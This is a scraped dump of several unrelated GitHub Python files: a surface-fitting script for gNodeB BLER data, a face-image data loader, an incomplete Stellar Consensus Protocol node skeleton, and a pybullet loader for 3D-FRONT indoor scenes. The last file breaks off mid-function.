')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n\n# Example of js\n# bs_uc3_ls50_ws50_x75_y50_n5000_p100.json\n\n\n# In this part we make our final DataFrame\n\n# combine DataFrames Except Location\nfinal = json_list[1]\nfor i in range(2,len(json_list)):\n final = pd.concat([final, json_list[i]], axis=1)\n\n#-----------------------------------------------\n# human sorting (also known as natural sorting):\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\ndef natural_keys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split(r'(\\d+)', text) ]\n#-----------------------------------------------\n\n# sort the columns by using human sorting\nfinal = final.reindex(sorted(final.columns, key=natural_keys), axis=1)\n\n# Add Location DataFrame to the final DataFrame\nfinal = pd.concat([json_list[0], final], axis=1)\n\n# Convert Location of UE to Numpy Array\nUE_Loc = np.zeros([2500,2])\nfor i in range(len(final['Location'])):\n d = re.findall('[\\d]{0,100}',final['Location'][i])\n UE_Loc[i] = [int(d[0])/2,int(d[4])/2]\n\n# Create DataFrame of the UE Location\nlocdf=pd.DataFrame(UE_Loc,columns=['X','Y'])\n\n# Add locatio DataFrame to the Main DataFrame\nfinal = pd.concat([locdf, final], axis=1)\ndel final['Location']\n\n# Convert Location of gNodeB to Numpy Array\ngNodeB_Loc = np.zeros([int((len(final.columns)-2)/4),2])\nfor i in range(0,len(gNodeB_Loc)):\n d = re.findall('[\\d]{2,3}',final.columns[i*4+2])\n gNodeB_Loc[i] = [int(d[0])/2,int(d[1])/2]\n\nprint(final.head())\nprint(final[final.columns[2:]].describe())\n\n## Defining the Colors for ploting\n# Colors which will be used in plots\ncolors = ['tab:red', 'tab:blue', 'tab:green', 'tab:pink', 'tab:olive', 'tab:gray', 'tab:brown', 'tab:orange', 'tab:purple']\n\nsort_colors = True\nif sort_colors is True:\n by_hsv = sorted((tuple(mcolors.rgb_to_hsv(mcolors.to_rgb(color))),name) for name, color in mcolors.CSS4_COLORS.items())\n names = [name for hsv, name in by_hsv]\nelse:\n names = list(colors)\n\n\n# 3D contour plot lines\nnumberOfContourLines = 16\ngraphWidth = 800 # units are pixels\ngraphHeight = 600 # units are pixels\n\n\n## Class for finding the fit of the data and ploting the results\nclass fit_func:\n '''\n this class in put is the Data and the A0\n Dataset name\n Data is the x,y,z\n A0 is the location of the gNodeB of the data which is ploting\n '''\n def __init__(self,dataset_name,data,A0):\n self.dataset_name = dataset_name\n self.data = data\n self.A0 = A0\n\n def dist_plot(self, dataset_name):\n '''\n this def will get the data and plots the distribution and\n find the best fit for the data distribution to get the sigma and\n the mean of the data\n '''\n # sns.set_style('white')\n # sns.set_context(\"paper\", font_scale = 2)\n # sns.displot(data=final[[dataset_name]], kind=\"hist\", bins = 1000, aspect = 1.5)\n\n BLER = final[[dataset_name]].values\n f = Fitter(BLER,distributions=['gamma','lognorm',\"beta\",\"burr\",\"norm\"])\n\n f.fit()\n print(f.summary())\n best_fit = f.get_best(method = 'sumsquare_error')\n # key = best_fit.keys()\n # key, value = best_fit.items()\n if best_fit.keys() == 'lognorm':\n for key, value in best_fit.items():\n print(\"best fit is {}\".format(key))\n for k, v in value.items():\n if k == 's':\n s = v\n if k == 'loc':\n loc = v\n if k == 'scale':\n scale = v\n sigma = s\n mean_1 = scipy.stats.lognorm.mean(s, 
loc=loc, scale=scale)\n print(\"\\n Best Fit on distribution: {} | sigma: {} | mean: {} \".format(best_fit, sigma, mean_1))\n\n def ScatterPlot(self,data):\n '''\n this def will plots the scatter plot of the Data\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n\n plt.grid(True)\n axes = Axes3D(f)\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n axes.scatter(x_data, y_data, z_data)\n axes.set_title('Scatter Plot for {} Data'.format(self.dataset_name))\n axes.set_xlabel('X Data')\n axes.set_ylabel('Y Data')\n axes.set_zlabel('BLER Data')\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n\n\n def SurfacePlot(self,func, data,fittedParameters):\n '''\n this def will plots the data and the surface fit\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n plt.grid(True)\n axes = Axes3D(f)\n\n # Data of the plot\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n # defining the X and Y amd the Z of plot\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm, linewidth=1, antialiased=True)\n\n axes.scatter(x_data, y_data, z_data) # show data along with plotted surface\n\n axes.set_title('Surface Plot for {} Data and the Fit Surface'.format(self.dataset_name)) # add a title for surface plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n axes.set_zlabel('BLER') # Z axis data label\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def ContourPlot(self,func, data, fittedParameters):\n '''\n this def will plot the counter plot of the data to have\n the sight of BLER zones\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n axes = f.add_subplot(111)\n\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot(x_data, y_data, 'o')\n\n axes.set_title('Contour Plot for {} Data and shows the zone of BLERs'.format(self.dataset_name)) # add a title for contour plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n\n CS = plt.contour(X, Y, Z, numberOfContourLines, colors='k')\n plt.clabel(CS, inline=1, fontsize=10) # labels for contours\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def func(self,data, alpha, beta,a ,b):\n x1 = data[0]\n y1 = data[1]\n # A0 = data[2]\n ## 2D\n x = np.linspace(min(x1), max(x1), int(np.sqrt(len(x1))))\n y = np.linspace(min(y1), max(y1), int(np.sqrt(len(y1))))\n X , Y = np.meshgrid(x,y)\n Z = alpha * (((X-A0[0]+a)**2)) + beta*((Y-A0[1]+b)**2)\n return Z.ravel()\n\n\n def fit_c(self):\n '''\n this the is using ...\n for fit...\n boundaries ...\n method ...\n maxfev ...\n x_scale and 
f f_scale ...\n telorance ...\n loss ...\n function ...\n '''\n x,y = self.data[0],self.data[1]\n\n # defining fitting Function\n\n loop = True\n while loop:\n\n # getting mean and sigma of data\n self.dist_plot(self.dataset_name)\n\n initialParameters = [.0001, .0001, 0 , 6]\n # here a non-linear surface fit is made with scipy's curve_fit()\n tol = 10**-15\n fittedParameters, pcov = scipy.optimize.curve_fit(self.func, [x,y], z, bounds=([ 0, 0, -10, -10], [ .001, .001, 10, 10]),method='trf',\n p0 = initialParameters,maxfev=10000,ftol=tol, xtol=tol, gtol=tol,\n x_scale=0.1, loss='cauchy', f_scale=0.1, diff_step=None, verbose = 2)\n # ,sigma = 2.520656362227073/zData,absolute_sigma=False,maxfev=1000\n # sigma has been taken from fitter library and the fit was lognoraml\n # scipy.optimize.minimize()\n\n print('fitted prameters', fittedParameters)\n modelPredictions = self.func(data, *fittedParameters)\n absError = modelPredictions - z\n\n SE = np.square(absError) # squared errors\n MSE = np.mean(SE) # mean squared errors\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\n Rsquared = 1.0 - (np.var(absError) / np.var(z))\n\n # Condition for stopping the loop\n if (RMSE == RMSE and Rsquared == Rsquared):\n loop = False\n # ploting\n # ScatterPlot(data)\n print('RMSE:', RMSE)\n print('R-squared:', Rsquared)\n self.SurfacePlot(self.func, data,fittedParameters)\n self.ContourPlot(self.func, data, fittedParameters)\n return Rsquared,RMSE,fittedParameters\n\n\nif __name__ == \"__main__\":\n # Defining Data\n x = np.array(final['X'])\n y = np.array(final['Y'])\n RR_list = list()\n\n # this loops will only consider the p = 50\n for i in range(2,len(final.columns),4):\n # A0 is the location of the gNodeB for the exact data\n A0 = gNodeB_Loc[int(abs(i/4)),:]\n\n print(\"\\n calculating fit for gNodeB location: {} and data: {} \".format(A0,final.columns[i]))\n\n z = np.array(final[final.columns[i]])\n data = [x, y, z]\n\n\n # defining model\n model = fit_func(final.columns[i],data,A0)\n\n # Taking the RMSE and the Rsquared\n Rsquared,RMSE,fittedParameters = model.fit_c()\n\n # saving data in the RR_list\n RR_list.append([final.columns[i],Rsquared,RMSE,fittedParameters])\n","repo_name":"alivara/curve_fitting","sub_path":"Surface Fit/surface_fit.py","file_name":"surface_fit.py","file_ext":"py","file_size_in_byte":12568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2404749716","text":"\"\"\"Functions for reading youtube face data.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport math\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\nrootDir = 'C:\\\\frame_images_DB\\\\frame_images_DB'\nIMAGE_SIZE = 160\n\ndef resize_image(image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\toutput = np.zeros([IMAGE_SIZE, IMAGE_SIZE, 3])\n\toutput[start_y : start_y + height, start_x : start_x + width, :] = np.array(image.resize((width, height), Image.BILINEAR))\n\treturn output\n\ndef make_box(x, y, size, image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = 
IMAGE_SIZE\n\tratio = 0\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\t\tratio = IMAGE_SIZE / shape[0]\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\t\tratio = IMAGE_SIZE / shape[1]\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\treturn [(x - size/2) * ratio + start_x, (x + size/2) * ratio + start_x, (y - size/2) * ratio + start_y, (y + size/2) * ratio + start_y]\n\nclass DataSet(object):\n\n\tdef __init__(self, filelist):\n\t\tfo = open(filelist, 'r')\n\t\tself._lines = fo.readlines()\n\t\tself._num_examples = len(self._lines)\n\t\tself._iter = 0\n\n\tdef _load_image(self, index):\n\t\tparts = self._lines[index].split(',')\n\t\timage = Image.open(rootDir + '\\\\' + parts[0])\n\t\tresized_image = resize_image(image).reshape([1, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\tbox = np.array(make_box(float(parts[1]), float(parts[2]), float(parts[3]), image))\n\t\timage.close()\n\t\treturn resized_image, box\n\n\tdef next_batch(self, size):\n\t\tdata = np.zeros([size, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\ttruth = np.zeros([size, 4])\n\t\tfor i in xrange(size):\n\t\t\tdata[i, :, :, :], truth[i, :] = self._load_image(self._iter)\n\t\t\tself._iter = (self._iter + 13) % self._num_examples\n\t\treturn data, truth\n\n\t@property\n\tdef num_examples(self):\n\t\treturn self._num_examples\n","repo_name":"VoidSolitary/youtube_face","sub_path":"input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5575770232","text":"class SCPNode:\n class State:\n INIT = 0\n PREPARED = 1\n COMMITTED = 2\n EXTERNALIZED = 3\n \n def __init__(self, node_id, threshold=1):\n self.node_id = node_id\n self.state = SCPNode.State.INIT\n self.ballot_protocol = None\n self.value_to_ballot = {}\n self.threshold = threshold\n self.validators = set()\n self.quorum_slices = []\n\n def add_vote(self, slot_index, value):\n if slot_index not in self.nomination_protocol_state:\n self.nomination_protocol_state[slot_index] = {'votes': set(), 'accepted': set()}\n self.nomination_protocol_state[slot_index]['votes'].add(value)\n\n def add_validator_set(self, validators):\n \"\"\"\n Add a set of validators as a quorum slice.\n\n :param validators: A list of SCPNode instances.\n \"\"\"\n if len(validators) >= self.threshold:\n self.quorum_slices.append(set(validators))\n\n def nominate(self, slot_index, value):\n self.add_vote(slot_index, value)\n message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return message\n\n def receive_message(self, message):\n if message.message_type == 'nominate':\n self.process_nomination_protocol(message)\n elif message.message_type == 'ballot':\n self.process_ballot_protocol(message)\n\n def process_nomination_protocol(self, message):\n slot_index = message.slot_index\n value = message.value\n quorum_slice = message.quorum_slice\n\n self.add_vote(slot_index, value)\n\n # Check if the value is accepted by a quorum slice\n if self.node_id in quorum_slice.validator_set and self.is_accepted_by_quorum_slice(slot_index, value, quorum_slice):\n self.nomination_protocol_state[slot_index]['accepted'].add(value)\n\n # Broadcast a new nomination message if the value is not already accepted by the node\n if value not in self.nomination_protocol_state[slot_index]['accepted']:\n 
new_message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return new_message\n\n def process_ballot_protocol(self, message):\n slot_index = message.slot_index\n ballot = message.ballot\n quorum_slice = message.quorum_slice\n ballot_state = self.ballot_protocol_state.get(slot_index)\n\n if not ballot_state:\n # Initialize the ballot state for this slot index\n self.ballot_protocol_state[slot_index] = {\n 'current_ballot': None,\n 'preparing': None,\n 'prepared': None,\n 'committing': None,\n 'committed': None,\n 'externalized': None\n }\n ballot_state = self.ballot_protocol_state[slot_index]\n\n if message.message_type == 'prepare':\n self.process_prepare(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'commit':\n self.process_commit(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'externalize':\n self.process_externalize(ballot_state, message, quorum_slice)\n\n def process_prepare(self, ballot_state, message, quorum_slice):\n # Implementation of the prepare sub-protocol\n pass\n\n def process_commit(self, ballot_state, message, quorum_slice):\n # Implementation of the commit sub-protocol\n pass\n\n def process_externalize(self, ballot_state, message, quorum_slice):\n # Implementation of the externalize sub-protocol\n pass\n\n def is_accepted_by_quorum_slice(self, slot_index, value, quorum_slice):\n count = 0\n for node in quorum_slice.validator_set:\n if node == self.node_id:\n continue\n if node.nomination_protocol_state.get(slot_index, {}).get('votes', None) and value in node.nomination_protocol_state[slot_index]['votes']:\n count += 1\n if count >= quorum_slice.threshold:\n return True\n return False\n\nclass QuorumSlice:\n def __init__(self, threshold, validator_set):\n self.threshold = threshold\n self.validator_set = validator_set\n\n def contains(self, node_id):\n return node_id in self.validator_set\n\n def is_quorum(self, node_set):\n count = 0\n for node in self.validator_set:\n if node.node_id in node_set:\n count += 1\n if count >= self.threshold:\n return True\n return False\n\nclass SCPMessage:\n def __init__(self, message_type, sender, slot_index, quorum_slice, value=None, ballot=None):\n self.message_type = message_type\n self.sender = sender\n self.slot_index = slot_index\n self.quorum_slice = quorum_slice\n self.value = value\n self.ballot = ballot\n\n def to_dict(self):\n message_dict = {\n 'message_type': self.message_type,\n 'sender': self.sender,\n 'slot_index': self.slot_index,\n 'quorum_slice': {\n 'threshold': self.quorum_slice.threshold,\n 'validator_set': [node.node_id for node in self.quorum_slice.validator_set]\n }\n }\n if self.value is not None:\n message_dict['value'] = self.value\n if self.ballot is not None:\n message_dict['ballot'] = {\n 'counter': self.ballot.counter,\n 'value': self.ballot.value\n }\n return message_dict\n\n @classmethod\n def from_dict(cls, message_dict, nodes):\n quorum_slice_dict = message_dict['quorum_slice']\n quorum_slice = QuorumSlice(\n threshold=quorum_slice_dict['threshold'],\n validator_set=[nodes[node_id] for node_id in quorum_slice_dict['validator_set']]\n )\n ballot_dict = message_dict.get('ballot')\n ballot = None\n if ballot_dict:\n ballot = SCPBallot(\n counter=ballot_dict['counter'],\n value=ballot_dict['value']\n )\n return cls(\n message_type=message_dict['message_type'],\n sender=message_dict['sender'],\n slot_index=message_dict['slot_index'],\n quorum_slice=quorum_slice,\n 
value=message_dict.get('value'),\n ballot=ballot\n )\n\nclass SCPBallot:\n def __init__(self, counter, value):\n self.counter = counter\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, SCPBallot):\n return False\n return self.counter == other.counter and self.value == other.value\n\n def __lt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n if self.counter < other.counter:\n return True\n if self.counter == other.counter:\n return self.value < other.value\n return False\n\n def __le__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self < other\n\n def __gt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return not self <= other\n\n def __ge__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self > other\n\n def __repr__(self):\n return f\"SCPBallot(counter={self.counter}, value={self.value})\"\n","repo_name":"jzhao49/BlockchainsS23FinalProject","sub_path":"scp.py","file_name":"scp.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"27256331045","text":"#!/usr/bin/env python3\n\nimport os\nimport random\nimport json\nimport numpy as np\nimport time\nimport logging\nfrom typing import List\n\nfrom pathlib import Path\nimport pybullet as pb\nfrom dataclasses import dataclass\n\nfrom imm.sim.env.env_base import EnvironmentBase\nfrom imm.sim.sim_debug_utils import debug_get_full_aabb\n\n\ndef _ceildiv(a, b):\n \"\"\" from https://stackoverflow.com/a/17511341 \"\"\"\n return -(-a // b)\n\n\ndef _split_multibody_kwargs(kwargs: dict) -> List[dict]:\n \"\"\"\n Split kwargs for createMultiBody, so that\n the number of links do not exceed the hardcoded #128 limit.\n\n NOTE(ycho): This is a hack - consider alternative solutions.\n \"\"\"\n\n num_links = len(kwargs['linkMasses'])\n num_bodies = _ceildiv(num_links, 128)\n\n # NOTE(ycho): Still return as a list even\n # in a trivial case.\n if num_bodies <= 1:\n return [kwargs]\n m = num_links // num_bodies\n\n out = [None for _ in range(num_bodies)]\n for i in range(num_bodies):\n # link slice range ...\n i0 = i * m\n i1 = min((i+1)*m, num_links)\n\n # Start from a copy of `kwargs`.\n out[i] = dict(kwargs)\n\n # Reset properties that should be unique to\n # a single base.\n # NOTE(ycho): This does not pedantically clear ALL properties -\n # only the ones that are known to be set at creation.\n out[i]['baseCollisionShapeIndex'] = -1\n out[i]['baseVisualShapeIndex'] = -1\n\n # Set a slice of link properties.\n for k, v in kwargs.items():\n if k.startswith('link'):\n out[i][k] = v[i0:i1]\n\n # Move base-unique properties into the first element in the split args.\n out[0]['baseCollisionShapeIndex'] = kwargs['baseCollisionShapeIndex']\n out[0]['baseVisualShapeIndex'] = kwargs['baseVisualShapeIndex']\n\n return out\n\n\ndef _load_tdf_scene(scene_file: str, model_dir: str, sim_id: int,\n use_convex_collision: bool):\n \"\"\"\n Load a 3DFRONT scene.\n \"\"\"\n model_dir = Path(model_dir)\n\n data = None\n with open(scene_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if data is None:\n return None\n\n # Build mapping from uid <-> jid\n model_uid = []\n model_jid = []\n model_map = dict()\n for f in data['furniture']:\n if 'valid' in f and f['valid']:\n model_map[f['uid']] = f['jid']\n\n # Build mapping from uid <-> mesh = { vertices, face_indices 
}\n mesh_map = dict()\n for m in data['mesh']:\n mesh_map[m['uid']] = (\n np.reshape(m['xyz'], (-1, 3)).astype(np.float32),\n np.reshape(m['faces'], (-1, 3))\n )\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_set = set()\n for m in data['mesh']:\n if m['type'].strip() == 'Floor':\n floor_set.add(m['uid'])\n\n # Iterate through and add shapes . . .\n scene = data['scene']\n room = scene['room']\n shape_map = dict()\n kwargs = {\n 'baseMass': 0, # fixed,\n 'baseCollisionShapeIndex': -1,\n 'baseVisualShapeIndex': -1,\n 'basePosition': [0, 0, 0],\n # NOTE(ycho): +Y up convention -> +Z up convention\n 'baseOrientation': pb.getQuaternionFromEuler([np.pi/2, 0, 0]),\n 'baseInertialFramePosition': [0, 0, 0],\n 'baseInertialFrameOrientation': [0, 0, 0, 1],\n\n 'linkMasses': [],\n 'linkCollisionShapeIndices': [],\n 'linkVisualShapeIndices': [],\n 'linkPositions': [],\n 'linkOrientations': [],\n 'linkInertialFramePositions': [],\n 'linkInertialFrameOrientations': [],\n 'linkParentIndices': [],\n 'linkJointTypes': [],\n 'linkJointAxis': [],\n\n 'physicsClientId': sim_id\n }\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_vertices = np.empty((0, 3), dtype=np.float32)\n floor_face_indices = np.empty((0), dtype=np.int32)\n\n for r in room:\n room_id = r['instanceid']\n children = r['children']\n for c in children:\n ref = c['ref']\n\n def _lookup_cache(ref):\n \"\"\" Lookup collision shape from cache. \"\"\"\n if ref not in shape_map:\n return -1, -1\n return shape_map[ref]\n\n def _lookup_model(ref):\n \"\"\" Lookup collision shape from 3D-FUTURE models. \"\"\"\n if ref not in model_map:\n return -1, -1\n mid = model_map[ref]\n model_file = (model_dir / mid / 'raw_model.obj')\n\n # NOTE(ycho): Temporary workaround for degenerate model?\n # if '39057a21-0a68-3494-8522-2e473dd6a38f' in str(model_file):\n # return -1, -1\n\n if not model_file.exists():\n logging.warn('No such model file : {}'.format(model_file))\n return -1, -1\n # TODO(ycho): remove this flag ... only for visualization\n # or leave it in? 
idk...\n col_id = pb.createCollisionShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n vis_id = pb.createVisualShape(\n pb.GEOM_MESH, fileName=str(model_file),\n meshScale=c['scale'],\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id\n )\n return (col_id, vis_id)\n\n def _lookup_mesh(ref):\n \"\"\" Lookup collision shape from inline mesh \"\"\"\n if ref not in mesh_map:\n return -1, -1\n (vertices, face_indices) = mesh_map[ref]\n vertices = vertices.astype(np.float64).reshape(-1, 3)\n\n # FIXME(ycho): This is a hack to enable visualization\n # against pybullet issues with backface culling - i.e.\n # rendering the walls from the exterior through a window.\n face_indices = np.c_[\n face_indices,\n face_indices[..., ::-1]\n ]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=vertices,\n indices=face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n # NOTE(ycho): VisualShape is redundant for now.\n # vis_id = pb.createVisualShape(pb.GEOM_MESH,\n # vertices=vertices,\n # indices=face_indices,\n # flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n # physicsClientId=sim_id)\n vis_id = -1\n return (col_id, vis_id)\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n if (ref in floor_set) and (ref in mesh_map):\n vertices, face_indices = mesh_map[ref]\n face_indices = face_indices.astype(np.int32).reshape(-1)\n R = np.reshape(pb.getMatrixFromQuaternion(c['rot']), (3, 3))\n floor_face_indices = np.r_[\n floor_face_indices, face_indices + len(floor_vertices)]\n floor_vertices = np.r_[\n floor_vertices, vertices @ R.T + c['pos']]\n continue\n\n # Loop through lookup methods until shape is found.\n col_id, vis_id = -1, -1\n for method in [_lookup_cache, _lookup_model, _lookup_mesh]:\n (col_id, vis_id) = method(ref)\n if col_id >= 0:\n break\n\n # Abort this entry if shape not found.\n if col_id < 0:\n continue\n\n # Cache any newly created shapes.\n if ref not in shape_map:\n shape_map[ref] = (col_id, vis_id)\n\n # NOTE(ycho):mass==0 indicates fixed body.\n kwargs['linkMasses'].append(0)\n kwargs['linkCollisionShapeIndices'].append(col_id)\n kwargs['linkVisualShapeIndices'].append(vis_id)\n kwargs['linkPositions'].append(c['pos'])\n kwargs['linkOrientations'].append(c['rot'])\n kwargs['linkInertialFramePositions'].append([0, 0, 0])\n kwargs['linkInertialFrameOrientations'].append([0, 0, 0, 1])\n kwargs['linkParentIndices'].append(0)\n kwargs['linkJointTypes'].append(pb.JOINT_FIXED)\n kwargs['linkJointAxis'].append([0, 0, 0])\n\n logging.info('# links = {}'.format(len(kwargs['linkMasses'])))\n\n # NOTE(ycho): Add special handling for floors.\n # NOTE(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_col_id = pb.createCollisionShape(pb.GEOM_MESH,\n vertices=floor_vertices,\n indices=floor_face_indices,\n flags=pb.GEOM_FORCE_CONCAVE_TRIMESH,\n physicsClientId=sim_id)\n kwargs['baseCollisionShapeIndex'] = floor_col_id\n\n # NOTE(ycho): pybullet does not expose MAX_DEGREE_OF_FREEDOM\n # limit on the maximum number of links possible on the multibody,\n # so we duplicate the hardcoded constant here.\n kwargss = _split_multibody_kwargs(kwargs)\n # kwargss = [kwargss[1]]\n body_ids = [pb.createMultiBody(**kwargs) for kwargs in kwargss]\n print('body_ids = {}'.format(body_ids))\n\n for 
body_id in body_ids:\n # Finally, add texture information to the visual shapes.\n # NOTE(ycho): Texture can only be added in the post-processing step\n # through pb.changeVisualShape().\n tex_map = {}\n vis_data = pb.getVisualShapeData(body_id, physicsClientId=sim_id)\n for i, v in enumerate(vis_data):\n # Lookup mesh file.\n mesh_file = v[4].decode('utf-8')\n if not mesh_file:\n continue\n\n # Find texture file based on mesh file path.\n # NOTE(ycho): Relies on the dataset structure of 3DFRONT.\n texture_file = Path(mesh_file).parent / 'texture.png'\n if not texture_file.exists():\n logging.error(\n 'Texture file : {} does not exist!'.format(texture_file))\n continue\n\n # Deal with texture id caching logic ...\n tex_id = -1\n if texture_file not in tex_map:\n tex_map[texture_file] = pb.loadTexture(\n str(texture_file), physicsClientId=sim_id)\n tex_id = tex_map[texture_file]\n\n # Finally, add texture information to the link.\n pb.changeVisualShape(body_id, i,\n textureUniqueId=tex_id,\n physicsClientId=sim_id)\n return body_ids\n\n\n@dataclass\nclass ThreeDFrontEnvironmentSettings:\n model_dir: str\n scene_file: str = ''\n scene_dir: str = ''\n use_convex_collision: bool = True\n\n use_fast_aabb_in_placement: bool = True\n max_placement_iter: int = 256\n\n\nclass ThreeDFrontEnvironment(EnvironmentBase):\n def __init__(self, settings: ThreeDFrontEnvironmentSettings):\n self.settings_ = settings\n self.env_ids_ = []\n self.sim_id_ = -1\n\n @property\n def sim_id(self):\n return self.sim_id_\n\n def reset(self, sim_id: int):\n self.sim_id_ = sim_id\n\n # Fetch or lookup scene file to instantiate.\n scene_file = ''\n if self.settings_.scene_file:\n scene_file = self.settings_.scene_file\n else:\n if self.settings_.scene_dir:\n # convenient shorthand.\n d = self.settings_.scene_dir\n scene_file = Path(d)/random.choice(os.listdir(d))\n scene_file = Path(scene_file)\n logging.info('Loading scene file = {}'.format(scene_file))\n if not scene_file.is_file():\n logging.error('Scene file : {} does not exist!'.format(scene_file))\n return\n\n # Load the scene.\n self.env_ids_ = _load_tdf_scene(str(scene_file),\n self.settings_.model_dir, sim_id,\n self.settings_.use_convex_collision)\n\n def place(self, robot_id: int):\n # TODO(ycho): Consider exposing this parameter.\n EPS = 1e-3\n\n robot_pose = pb.getBasePositionAndOrientation(robot_id,\n physicsClientId=self.sim_id)\n old_pos = robot_pose[0]\n old_rot = robot_pose[1]\n old_z = old_pos[2]\n\n floor_aabb = np.asarray(pb.getAABB(\n self.env_ids_[0], -1, physicsClientId=self.sim_id), dtype=np.float32)\n robot_aabb = debug_get_full_aabb(self.sim_id, robot_id)\n robot_size = robot_aabb[1] - robot_aabb[0]\n\n # NOTE(ycho): Shrink the sampled space by the robot radius.\n pos_min = floor_aabb[0, :2] + 0.5 * robot_size[:2]\n pos_max = floor_aabb[1, :2] - 0.5 * robot_size[:2]\n\n for i in range(self.settings_.max_placement_iter):\n logging.debug('Placement {}/{}'.format(i,\n self.settings_.max_placement_iter))\n # Sample X-Y position from floor AABB.\n x, y = np.random.uniform(pos_min, pos_max)\n\n # Cast ray from robot top -> floor.\n ray_src = [x, y, floor_aabb[1, 2] +\n robot_aabb[1, 2] - robot_aabb[0, 2]]\n ray_dst = [x, y, floor_aabb[0, 2] - EPS]\n ray_res = pb.rayTest(ray_src, ray_dst, physicsClientId=self.sim_id)\n\n # If by some magic, multiple intersections happened,\n # ignore this case.\n if len(ray_res) != 1:\n continue\n ray_res = ray_res[0]\n\n # The ray must hit env + floor.\n if (ray_res[0] != self.env_ids_[0]) or (ray_res[1] != -1):\n 
